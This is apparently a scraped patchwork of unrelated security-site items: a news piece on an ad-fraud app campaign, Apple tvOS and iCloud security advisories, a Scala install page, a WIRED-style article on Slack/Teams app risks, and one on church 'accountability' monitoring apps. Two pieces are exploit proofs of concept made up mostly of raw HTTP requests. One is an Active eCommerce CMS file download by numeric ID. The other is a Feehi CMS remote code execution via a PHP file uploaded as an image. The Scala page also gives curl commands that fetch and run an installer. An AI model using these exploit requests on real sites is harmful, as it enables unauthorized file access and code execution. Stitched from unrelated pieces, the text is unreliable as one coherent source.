Active eCommerce CMS version 6.3.0 suffers from an arbitrary file download vulnerability.

    # Exploit Title: Active eCommerce CMS Arbitrary File Download# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405# Version: Version 6.3.0# Tested on Ubuntu 18.04without authentication with for loop user can download all files on the website with numeric ids./aiz-uploadder/download/{id}<--Vulnerable source code-->public function attachment_download($id)    {        $project_attachment = Upload::find($id);        try{           $file_path = public_path($project_attachment->file_name);            return Response::download($file_path);        }catch(\Exception $e){            flash(translate('File does not exist!'))->error();            return back();        }    }-------Request-----------GET /aiz-uploader/download/3 HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBUConnection: close

Active eCommerce CMS 6.3.0 Arbitrary File Download

The ongoing ad fraud campaign can be traced back to 2019, but recently expanded into the iOS ecosystem, researchers say.

The threat actors behind a newly discovered malicious advertising app operation have been active since at least 2019, but researchers tracking their evolution report the group has become more sophisticated, expanding beyond its previous Android-specific attacks into the iOS ecosystem.

The latest campaign, according to researchers with Human Security's Satori research team, included 80 Android Apps lurking in the Google Play store and, notably, 9 in the Apple App Store. All together, the team reported the malicious applications were downloaded at least 13 million times.

Once downloaded, the malicious applications spoof other apps to rack up digital ad views, play hidden ads the user couldn't see to gain fraudulent views, and even track legitimate ad clicks to hone the group's ability to fake them more convincingly later.

The research team, which flagged the apps for removal from the official stores, calls this latest iteration of the attack group Scylla. The earliest version of the group was called Poseidon, then Charybdis. Scylla is the third wave of attacks from the threat actors, the Human team explained in their report.

"Today's announcement of the disruption of Scylla — named after the granddaughter of Poseidon — reflects a new evolution from the threat actors behind the scheme," the Human team said about the find. "While the Poseidon and Charybdis operations centered wholly on Android apps, the Satori team has found evidence that Scylla additionally targets iOS apps and has expanded the attack to other parts of the digital advertising ecosystem."

Human Security worked with Google and Apple to remove the malicious applications and is continuing to work with advertising software development kit developers to mitigate the campaign's fallout.

"These tactics, combined with the obfuscation techniques first observed in the Charybdis operation, demonstrate the increased sophistication of the threat actors behind Scylla," the Human team added. "This is an _ongoing_ attack, and users should consult the list of apps in the report and consider removing them from all devices."

Malicious Apps With Millions of Downloads Found in Apple App Store, Google Play

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3, iOS 15.4 and iPadOS 15.4, tvOS 15.4, Safari 15.4. Processing maliciously crafted web content may lead to arbitrary code execution.

Released March 14, 2022

**Accelerate Framework**

Available for: Apple TV 4K and Apple TV HD

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2022-22633: ryuzaki

Entry added May 25, 2022

**Accelerate Framework**

Available for: Apple TV 4K and Apple TV HD

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: ryuzaki

Entry added May 25, 2022

**AppleAVD**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.

**AVEVideoEncoder**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2022-22634: an anonymous researcher

**AVEVideoEncoder**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22635: an anonymous researcher

**AVEVideoEncoder**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22636: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**IOGPUFamily**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**LLVM**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to delete files for which it does not have permission

Description: A race condition was addressed with additional validation.

CVE-2022-21658: Florian Weimer (@fweimer)

Entry added May 25, 2022

**MediaRemote**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to identify what other applications a user has installed

Description: An access issue was addressed with improved access restrictions.

CVE-2022-22670: Brandon Azad

**Preferences**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Sandbox**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran

Entry updated May 25, 2022

**UIKit**

Available for: Apple TV 4K and Apple TV HD

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

CVE-2022-22624: About the security content of tvOS 15.4

An out-of-bounds read was addressed with improved input validation. This issue is fixed in iCloud for Windows 11.4, iOS 14.0 and iPadOS 14.0, watchOS 7.0, tvOS 14.0, iCloud for Windows 7.21, iTunes for Windows 12.10.9. Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents.

This document describes the security content of iCloud for Windows 7.21.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**iCloud for Windows 7.21**

Released September 24, 2020

**ImageIO**

Available for: Windows 7 and later

Impact: Processing a maliciously crafted tiff file may lead to a denial-of-service or potentially disclose memory contents

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2020-36521: Xingwei Lin of Ant-Financial Light-Year Security Lab

Entry added May 25, 2022

**SQLite**

Available for: Windows 7 and later

Impact: A remote attacker may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2020-9991

Entry added November 12, 2020

**SQLite**

Available for: Windows 7 and later

Impact: Multiple issues in SQLite

Description: Multiple issues were addressed by updating SQLite to version 3.32.3.

CVE-2020-15358

Entry added November 12, 2020

**WebKit**

Available for: Windows 7 and later

Impact: Processing maliciously crafted web content may lead to a cross site scripting attack

Description: An input validation issue was addressed with improved input validation.

CVE-2020-9952: Ryan Pickren (ryanpickren.com)

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: May 25, 2022

CVE-2020-36521: About the security content of iCloud for Windows 7.21

Scala 2.13.x before 2.13.9 has a Java deserialization chain in its JAR file. On its own, it cannot be exploited. There is only a risk in conjunction with LazyList object deserialization within an application. In such situations, it allows attackers to erase contents of arbitrary files, make network connections, or possibly run arbitrary code (specifically, Function0 functions) via a gadget chain.

**Install Scala with cs setup (recommended)**

To install Scala, it is recommended to use cs setup, the Scala installer powered by Coursier. It installs everything necessary to use the latest Scala release from a command line:

Run the following command in your terminal, following the on-screen instructions:

    brew install coursier/formulas/coursier && cs setup

Alternatively, if you don't use Homebrew:

    curl -fL https://github.com/coursier/launchers/raw/master/cs-x86_64-apple-darwin.gz | gzip -d > cs && chmod +x cs && (xattr -d com.apple.quarantine cs || true) && ./cs setup

Run the following command in your terminal, following the on-screen instructions:

    curl -fL https://github.com/coursier/launchers/raw/master/cs-x86_64-pc-linux.gz | gzip -d > cs && chmod +x cs && ./cs setup

Testing your setup

Check your setup with the command scala -version, which should output:

    $ scala -version
    Scala code runner version 3.2.0 -- Copyright 2002-2022, LAMP/EPFL

If that does not work, you may need to log out and log back in (or reboot) in order for the changes to take effect.

If you are just beginning your journey with Scala, we recommend that you read our getting started guide, which expands upon these details, teaching you how to build your first Scala project:

Get Started with Scala

**Other ways to install Scala**

Each Scala release has its own page listing alternative installation methods. Click the button above to see the full list of Scala releases, or pick from the most recent releases below.

**Maintenance releases**  

*   Latest 2.12.x maintenance release: **2.12.17**  
    Released on September 16, 2022
*   Last 2.11.x maintenance release: **2.11.12**  
    Released on November 9, 2017
*   Last 2.10.x maintenance release: **2.10.7**  
    Released on November 9, 2017

CVE-2022-36944: Install

New research shows how third-party apps could be exploited to infiltrate these sensitive workplace tools.

Collaboration apps like Slack and Microsoft Teams have become the connective tissue of the modern workplace, tying together users with everything from messaging to scheduling to video conference tools. But as Slack and Teams become full-blown, app-enabled operating systems of corporate productivity, one group of researchers has pointed to serious risks in what they expose to third-party programs—at the same time as they're trusted with more organizations' sensitive data than ever before.

A new study by researchers at the University of Wisconsin-Madison points to troubling gaps in the third-party app security model of both Slack and Teams, which range from a lack of review of the apps’ code to default settings that allow any user to install an app for an entire workspace. And while Slack and Teams apps are at least limited by the permissions they seek approval for upon installation, the study's survey of those safeguards found that hundreds of apps' permissions would nonetheless allow them to potentially post messages as a user, hijack the functionality of other legitimate apps, or even, in a handful of cases, access content in private channels when no such permission was granted.

“Slack and Teams are becoming clearinghouses of all of an organization’s sensitive resources,” says Earlence Fernandes, one of the researchers on the study who now works as a professor of computer science at the University of California at San Diego, and who presented the research last month at the USENIX Security conference. “And yet, the apps running on them, which provide a lot of collaboration functionality, can violate any expectation of security and privacy users would have in such a platform.”

When WIRED reached out to Slack and Microsoft about the researchers' findings, Microsoft declined to comment until it could speak to the researchers. (The researchers say they communicated with Microsoft about their findings prior to publication.) Slack, for its part, says that a collection of approved apps that is available in its Slack App Directory does receive security reviews before inclusion and are monitored for any suspicious behavior. It "strongly recommends" that users install only these approved apps and that administrators configure their workspaces to allow users to install apps only with an administrator's permission. "We take privacy and security very seriously," the company says in a statement, "and we work to ensure that the Slack platform is a trusted environment to build and distribute apps, and that those apps are enterprise-grade from day one."

But both Slack and Teams nonetheless have fundamental issues in their vetting of third-party apps, the researchers argue. They both allow integration of apps hosted on the app developer's own servers with no review of the apps' actual code by Slack or Microsoft engineers. Even the apps reviewed for inclusion in Slack's App Directory undergo only a more superficial check of the apps' functionality to see whether they work as described, check elements of their security configuration such as their use of encryption, and run automated app scans that check their interfaces for vulnerabilities.

Despite Slack's own recommendations, both collaboration platforms by default allow any user to add these independently hosted apps to a workspace. An organization's administrators can switch on stricter security settings that require the administrators to approve apps before they're installed. But even then, those administrators must approve or deny apps without themselves having any ability to vet their code, either—and crucially, the apps' code can change at any time, allowing a seemingly legitimate app to become a malicious one. That means attacks could take the form of malicious apps disguised as innocent ones, or truly legitimate apps could be compromised by hackers in a supply chain attack, in which hackers sabotage an application at its source in an effort to target the networks of its users. And with no access to apps' underlying code, those changes could be undetectable to both administrators and any monitoring system used by Slack or Microsoft.

All of that leaves users—who have grown accustomed to more well-secured third-party app environments, such as the code reviews implemented in Apple's App Store and Google Play—vulnerable to risks they don't expect when they install a seemingly innocent app on their organization's collaboration workspace. "Compared to iOS or Android, I would say their security model is at least five to six years behind," University of Wisconsin researcher Yunang Chen says of Slack and Teams.

As in other stricter app models, Slack and Teams limit apps' data access with a set of permissions that users must approve for an app to be installed. But—setting aside that a single user can often approve those access permissions for an entire organization—the researchers found that apps' permissions can sometimes allow them to perform unexpected and dangerous behaviors. An app intended for scheduled posts that asks for the ability to post as the user can, for instance, impersonate them as part of a phishing scheme or send messages from their account to trigger another app's functionality. In some instances, software developers even allow changes to their code repositories based on Slack messages, potentially allowing an app that sends messages from a user account to alter code and corrupt their software.

In another attack, researchers found that apps can "overwrite" the command that launches another app in Slack or Teams, such as typing "/zoom" in one of the platforms to start a Zoom meeting. A malicious app, the researchers point out, could hijack that command to make "/zoom" instead launch an imposter copy of Zoom that intercepts all the users' communications. While the researchers note that Slack has recently added a safeguard that warns when an app overwrites a command in this way, it warns the user only upon installation of the app, and malicious apps can still perform that takeover trick after they're installed.

To get a sense of just how many apps might pose these sorts of risks, the researchers surveyed the permissions of all Slack and Teams apps and found that about one in three Teams apps and almost one in four Slack apps ask for permissions that would allow them to act as the user, posting messages or adding emoji reactions on their behalf. 52 percent of Slack apps ask for permissions that would allow them to overwrite another app's launch command.

The researchers also point to yet another security issue, specific to Slack, that can allow an app to access private channels that are "locked" and intended to be accessible only to specific users—even when the app asks for no such permission. The researchers found that when a link to a message in a private channel is copied into a user's direct messages to themselves, the private channel message "unfurls," and its text appears in that conversation if the user is a member of the private channel. So an app that merely asks for read and write access to a user's direct messages and basic information about—but not the content of—their private channels can also read all the messages posted to a private channel. (The app could also quickly delete the direct messages it sends to the user as part of the attack, to avoid leaving a record of its snooping.) In their survey of app permissions, the researchers found 11 Slack apps that ask for exactly those permissions, and thus could gain this unexpected private channel access.

Despite Microsoft's response to WIRED that it wanted to discuss the researchers' findings before commenting, the researchers write in their paper that they approached both Slack and Microsoft with their findings prior to publication, and both companies confirmed that their attack techniques were possible. They write, however, that Slack and Microsoft didn't consider their findings to "meet their definitions of a security vulnerability," since they required deceiving users into installing a malicious app, and both Slack and Microsoft expect workspace administrators to police those installations. But that response only puts the onus on administrators, argues University of Wisconsin researcher Yue Gao, who "are even worse off than Slack" when it comes to assessing an app's legitimacy.

Some of the problems that the researchers identified in Slack and Teams—like apps' ability to overwrite other apps' launch commands and read messages in private channels—could be fixed with relatively simple patches, says Andrei Sabelfeld, a computer science professor at Chalmers University of Technology in Sweden who reviewed the researchers' work. But if Slack and Teams apps continue to be hosted on third-party servers, the deeper problem would remain. "There's no way to have any account of what the developers are doing," Sabelfield says. "This points to a fundamental tension: The code is outside their control."

That means, both Sabelfield and the University of Wisconsin researchers argue, that any real fix would require Slack and Microsoft to broadly overhaul their app model to make it more like traditional operating systems that carefully vet the code of apps, monitor that code for changes, and strictly enforce the permissions apps are granted. If Slack and Teams are going to become the hub traversed by every organization's holiest of holy data, in other words, it's time they took better care of who is invited to the inner sanctum.

Slack’s and Teams’ Lax App Security Raises Alarms

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

Churches are using invasive phone-monitoring tech to discourage “sinful” behavior. Some software is seeing more than congregants realize.

Gracepoint is the kind of evangelical Southern Baptist church that’s compelled to publicly enumerate all of the ways it’s not a cult. “We’ll admit that we’re a bit crazy about the Great Commission and sharing the Gospel,” reads an FAQ page titled, “Is Gracepoint a Cult?” So when Grant Hao-Wei Lin came out to a Gracepoint church leader during their weekly one-on-one session, he was surprised to learn that he wasn’t going to be kicked out. According to his church leader, Hao-Wei Lin says, God still loved him in spite of his “struggle with same-sex attraction.”

But Gracepoint did not leave the matter in God’s hands alone. At their next one-on-one the following week, Hao-Wei Lin says the church leader asked him to install an app called Covenant Eyes on his phone. The app is explicitly marketed as anti-pornography software, but according to Hao-Wei Lin, his church leader told him it would help “control all of his urges.”

Covenant Eyes is part of a multimillion-dollar ecosystem of so-called accountability apps that are marketed to both churches and parents as tools to police online activity. For a monthly fee, some of these apps monitor everything their users see and do on their devices, even taking screenshots (at least one per minute, in the case of Covenant Eyes) and eavesdropping on web traffic, WIRED found. The apps then report a feed of all of the users’ online activity directly to a chaperone—an “accountability partner,” in the apps’ parlance. When WIRED presented its findings to Google, however, the company determined that two of the top accountability apps—Covenant Eyes and Accountable2You—violate its policies.

The omnipotence of Covenant Eyes soon weighed heavily on Hao-Wei Lin, who has since left Gracepoint. Within a month of installing the app, he started receiving accusatory emails from his church leader referencing things he had viewed online. “Anything you need to tell me?” reads one email Hao-Wei Lin shared with WIRED. Attached was a report from Covenant Eyes that detailed every single piece of digital content Hao-Wei Lin had consumed the prior week. It was a trail of digital minutiae accumulated from nights spent aimlessly browsing the internet, things Hao-Wei Lin could barely remember having seen—and would have forgotten about had a member of his Church not confronted him. The church leader zeroed in on a single piece of content that Covenant Eyes had flagged as “Mature”: Hao-Wei Lin had searched “#Gay” on a website called Statigr.am, and the app had flagged it.

Gracepoint, which focuses on colleges, claims to “serve students” on more than 70 campuses across the United States. According to emails between a Covenant Eyes representative and a former Gracepoint church leader that WIRED reviewed, the company said that in 2012 as many as 450 Gracepoint Church members were signed up to be monitored through Covenant Eyes.

“I wouldn’t quite call it spyware,” says a former member of Gracepoint who was asked to use Covenant Eyes and spoke on the condition of anonymity, due to privacy concerns. “It’s more like ‘shameware,’ and it’s just another way the church controls you.”

Similar to surveillance software like Bark or NetNanny, which is used to monitor children at home and school, “shameware” apps are lesser-known tools that are used to keep track of behaviors parents or religious organizations deem unhealthy or immoral. Fortify, for instance, was developed by the founder of an anti-pornography nonprofit called Fight the New Drug and tracks how often an individual masturbates in order to help them overcome “sexual compulsivity.” The app has been downloaded over 100,000 times and has thousands of reviews on the Google Play store.

The current iteration of the Covenant Eyes app was developed by Michael Holm, a former NSA mathematician who now serves as a data scientist for the company. The system is allegedly capable of distinguishing between pornographic and non-pornographic images. The software captures everything visible on a device’s screen, analyzing the images locally before slightly blurring them and sending them to a server to be saved. “Image-based pornography detection was a huge conceptual change for Covenant Eyes,” Holm told _The Christian Post_, an evangelical Christian news outlet, in 2019. “While I didn’t yet know it, God had put me in that place at that time for a purpose higher than myself, just as I and others had desired and prayed for.”

Covenant Eyes spokesperson Dan Armstrong says the company is “concerned” about “people being monitored without proper consent.” He adds that “accountability relationships are better off between people who already know each other and want the best for one another, such as close personal friends and family members,” and that the company discourages using its app in relationships with a power imbalance.

Among the top accountability apps—including Accountable2You and EverAccountable—Covenant Eyes appears to be the largest player. The company organizes conferences that are attended by thousands of people and dedicated to educating attendees about the dangers of pornography while pitching the company’s product as an urgent solution to what it characterizes as a growing moral crisis. According to the app analytics firm AppFigures, in the past year more than 50,000 people have downloaded Covenant Eyes. Rocketreach estimates that the company has an annual revenue of $26 million.

Ed Kang, pastor of Gracepoint Church in Berkeley, California, and a major figure in the organization, says in an email that volunteer staff members are required to install Covenant Eyes or Accountable2You “as part of their staff agreement.” But he disputes that church leaders were instructed to monitor congregants’ phone activity. “Usually it’s whoever they \[congregants\] designate, and we actually discourage leaders from being the accountability partners as that seems a bit too heavy,” he writes. (All five former Gracepoint congregants who spoke to WIRED said a church leader was their accountability partner.) Kang adds that the number of Gracepoint congregants who use Covenant Eyes or Accountable2You “may be significantly higher than 450 nowadays” and that Accountable2You “has better pricing.”

What’s common across Covenant Eyes, Accountable2You, and EverAccountable is their zero-tolerance approach to pornography. All three suggest in their marketing materials that not only is watching porn a moral failure, but any amount of porn consumption is bad for your health. Their solution: Promote purity through what they call “radical accountability,” a concept wherein a community comes together to confront a person who is living in sin. At its most basic level, the idea is pretty straightforward: Why would anyone watch porn if they are going to have to talk to their parents or pastor about it?

While these apps claim to have helped many people overcome pornography addictions, experts who study sexual health are skeptical that the apps have a lasting positive effect. “I’ve never seen anyone who’s been on one of these apps feel better about themselves in the long term,” says Nicole Praus, a scientist at the University of California, Los Angeles, who studies the effects of pornography on the brain and the spread of disinformation on sexual health. “These people just end up feeling like there’s something wrong with them when the reality is that there likely isn’t.”

But Covenant Eyes and Accountable2You do much more than just police pornography. When WIRED downloaded, decompiled, and tested Covenant Eyes and Accountable2You, we found that both apps are built to collect, monitor, and report all sorts of innocent behavior. The applications exploited Android’s accessibility permissions to monitor almost everything someone does on their phone. While the accessibility functionalities are meant to help developers build out features that assist people with disabilities, these apps take advantage of such permissions to either capture screenshots of everything actively being viewed on the device or detect the name of apps as they’re being used and record every website visited in the device’s browser.

In Hao-Wei Lin’s case, that included his Amazon purchases, articles he read, and even which friends’ accounts he looked at on Instagram. The trouble is, according to Hao-Wei Lin, providing his church leader with a ledger of everything he did online meant his pastor could always find something to ask him about, and the way Covenant Eyes flagged content didn’t help. For example, in Covenant Eyes reports that Hao-Wei Lin shared with WIRED, his online psychiatry textbook was rated “Highly Mature,” the most severe category of content reserved for “anonymizers, nudity, erotica, and pornography.” The same was true of anything Hao-Wei Lin felt was “remotely gay,” like his Statigr.am searches.

After WIRED contacted Google about Covenant Eyes and Accountable2You, both apps were suspended from the Google Play store. “Google Play permits the use of the Accessibility API for a wide range of applications,” spokesperson Danielle Cohen says in an email. “However, only services that are designed to help people with disabilities access their device or otherwise overcome challenges stemming from their disabilities are eligible to declare that they are accessibility tools.”

Covenant Eyes and Accountable2You both remain available on iOS. While WIRED did not test the apps on Apple devices, neither app appears to utilize iOS’ accessibility permissions. Apple has not yet responded to a request for comment.

In our tests of Accountable2You prior to its suspension, we found that the software similarly flagged content with keywords like “gay” or “lesbian” in the URL. For instance, when we set up a test account and navigated to the US Centers for Disease Control’s website for LGBTQ youth resources, the phone we designated as our accountability partner was immediately texted and emailed a “questionable activity report” indicating that our test phone had visited a “Highly Questionable” website.

“It’s really not about pornography,” says Brit, a former user of Accountable2You who asked to only be identified by her first name, due to privacy concerns. “It’s about making you conform to what your pastor wants.” Brit says she was asked to install the app by her parents after she was caught looking at pornography and that her mother and her pastor were both her designated accountability partners. “I remember I had to sit down and have a conversation with him \[her pastor\] after I Wikipedia’d an article about atheism,” she says. “I was a kid, but that doesn’t mean I don’t have some kind of right to read what I want to read.”

